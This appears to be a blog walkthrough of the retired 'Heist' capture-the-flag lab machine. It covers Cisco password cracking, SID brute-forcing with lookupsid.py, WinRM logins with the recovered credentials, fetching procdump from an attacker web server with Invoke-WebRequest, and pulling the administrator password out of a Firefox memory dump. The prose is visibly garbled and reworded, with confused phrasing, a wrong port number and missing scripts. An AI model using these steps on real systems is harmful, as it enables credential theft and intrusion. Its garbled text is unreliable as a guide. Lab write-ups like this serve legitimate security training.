Heist an Introduction

Heist an Introduction


Introduction

Switch to a new blog. Today we’re going to go through the walkthrough of the recently retired Heist unit. It’s been given the easy rating, but I think it was pretty tricky and a bit difficult, because I’m a noob and I’m always scared when it comes to using Windows. But we must all start from somewhere, so we figured we should try this package.

Heist an Introduction

Recon

We’re going to start by doing a Nmap scan with our recon.

nmap -sC -sV -p- 10.10.10.149

Heist an Introduction

Port 80 is therefore free. Let’s search in our browser first

Heist an Introduction

It’s a page of access. Access as a guest is a choice below, so let’s try this.

Heist an Introduction

From the above picture, we can clearly see that there is a chat session between a user Hazard and the support administrator where the user Hazard has some problems with his cisco router and has added the configurations to it and has also asked the admin to create an account for him. Let’s access and attempt to examine the attachment.

Heist an Introduction

Seems like it contains 2 cisco type 7 and 1 type 5 passwords … We can use no online tools to decyprt type 7 passwords. I used the connection below:

Heist an Introduction
Heist an Introduction

So here are the credentials we’ve learned so far:

rout3r: $uperP@ssword

admin: Q4)sJu\Y8qz*A3?d However, if we use these credentials on the web page, we can not log in successfully

We also have another password of form 5 of cisco and will use hashcat to crack it.

So we can check the number associated with the form of hash when typing in hashcat -h.

Heist an Introduction

Let’s have a hashcat run by typing in:

Heist an Introduction
Heist an Introduction

And we’ve finally cracked it:

$1$pdQG$o8nrSzsGXeaduXrjlvKc91 : stealth1agent But when we try this password in the login portal we can’t login yet.

Let’s check our review of the Nmap again. We can see the open 5895 port used by WinRm (Microsoft Windows Remote Management), which is essentially a service / protocol used for remote system management. So here’s an awesome ruby script to send us a shell:

I’ve tried all the usernames and passwords I’ve found so far, but again I haven’t been successful Anyway, after banging my head for quite a long time, I got a hint from the forum that by bruteforcing SIDs (Security Identifiers) via SMB we can enumerate more users.

From impacket we can use lookupsid.py to bruteforce more users.

Exploitation

And this next pair finally worked after a number of variations “Hazard:stealth1agent” and it was able to bruteforce more users.

python lookupsid.py Hazard:stealth1agent@10.10.10.149

Heist an Introduction

Let’s try again to connect all these users to the machine through WinRM.

And the following pair seemed to work: “Chase:Q4)sJu\Y8qz*A3?d”

Heist an Introduction

Let’s try running the ruby file now.

And we should be getting our user flag.

Heist an Introduction

Privilege Escalation

Now for our root flag to move on.

Heist an Introduction
Heist an Introduction

So we see instances running on firefox. By taking a dump of the firefox process we can test whether any important pieces of information are present in the memory / ram.

We are able to download Procdump.exe from here:

We will position it in our web server after downloading the exe file (inside /var / www / html/)and run service apache2 start to start the webserver.

We can now move back to the shell using the Invoke-WebRequest command to retrieve a file.

To open the exe file in the current directory, type the following command:

Invoke-WebRequest -Uri http://webserver/procdump64.exe -OutFile proc.exe

Next we’ll take the dump from the firefox operation. There are about 4 processes in firefox. We’ll take the dump from the one with the highest use of the CPU.

So type in the following to take the dump:

./proc.exe -ma

Heist an Introduction

This is going to create a dump. The next move is to examine it. I wanted the dump to be moved to my laptop, but I couldn’t find a way.

But to check for important pieces of information from our own WinRM container, we could still examine it.

Cat over this dump will give us a lot of details on working, so what we can do is grep some important strings like

username or password.

cat firefox.exe_191130_175757.dmp | Select-String “username=”

Here in PowerShell, select-string is essentially equivalent to grep in Linux.

Heist an Introduction

Using the same script used before, we can use the creds above to log in via WinRM again. Just change the username to Administrator and password to the string we got from the dump(shown in the above picture).

Heist an Introduction

All set, let’s run the ruby script, and our root flag should be issued.

Heist an Introduction

And that’s the end of the box.

So that’s for now. See you next time.



Solutions

Solutions

Services

Services